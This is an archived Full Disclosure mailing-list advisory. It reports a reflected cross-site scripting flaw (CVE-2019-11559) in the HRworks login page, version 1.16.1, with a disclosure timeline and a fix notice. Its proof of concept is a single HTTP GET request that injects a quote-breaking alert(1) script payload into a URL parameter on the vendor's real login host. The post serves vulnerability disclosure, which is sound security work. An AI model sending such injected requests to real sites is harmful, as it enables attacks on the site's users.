[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] =?utf-8?q?Reflected_XSS_=E2=80=93_HRworks_Login_=28v1=2E16?= =?utf-8?b?LjEp?=
From:       Georg Ph E Heise via Fulldisclosure <fulldisclosure () seclists ! org>
Date:       2019-09-18 9:51:06
Message-ID: hrQCrKo1hdx11wxj5JgnYKRuJv4QPQQ4CamolgI77D1R69t4nJKPVAaT4nECphjKleKdI2EmCOMOMpqGz9roMmpKZKV1ru8cPS5T9ccO62o= () protonmail ! com
[Download RAW message or body]

# Exploit Title:  Reflected XSS – HRworks Login (v1.16.1)

# Vendor Homepage: https://www.hrworks.de

# Exploit Author: Georg Philipp Erasmus Heise / Lufthansa Industry Solutions

# Contact: https://twitter.com/gpheheise

# Website: https://www.lufthansa-industry-solutions.com

# Category: webapps

# CVE: CVE-2019-11559

Timeline

26.04.2019 Disclosure to Vendor

29.04.2019 Vendor informed that the issue was remediated

17.09.2019 Publication

1. Description:

The URL parameter of the login page accepts unfiltered parameters that lead to several version of reflected XSS

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11559

2. Proof of Concept:

Vulnerable Source

http://login.hrworks.de

PoC

GET /?re44h"-alert(1)-"bb8rf=1 HTTP/1.1

Host: login.hrworks.de

Accept-Encoding: gzip, deflate

Accept: */*

3. Solution:

As date of publication all versions above 1.16.3 are save to use

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic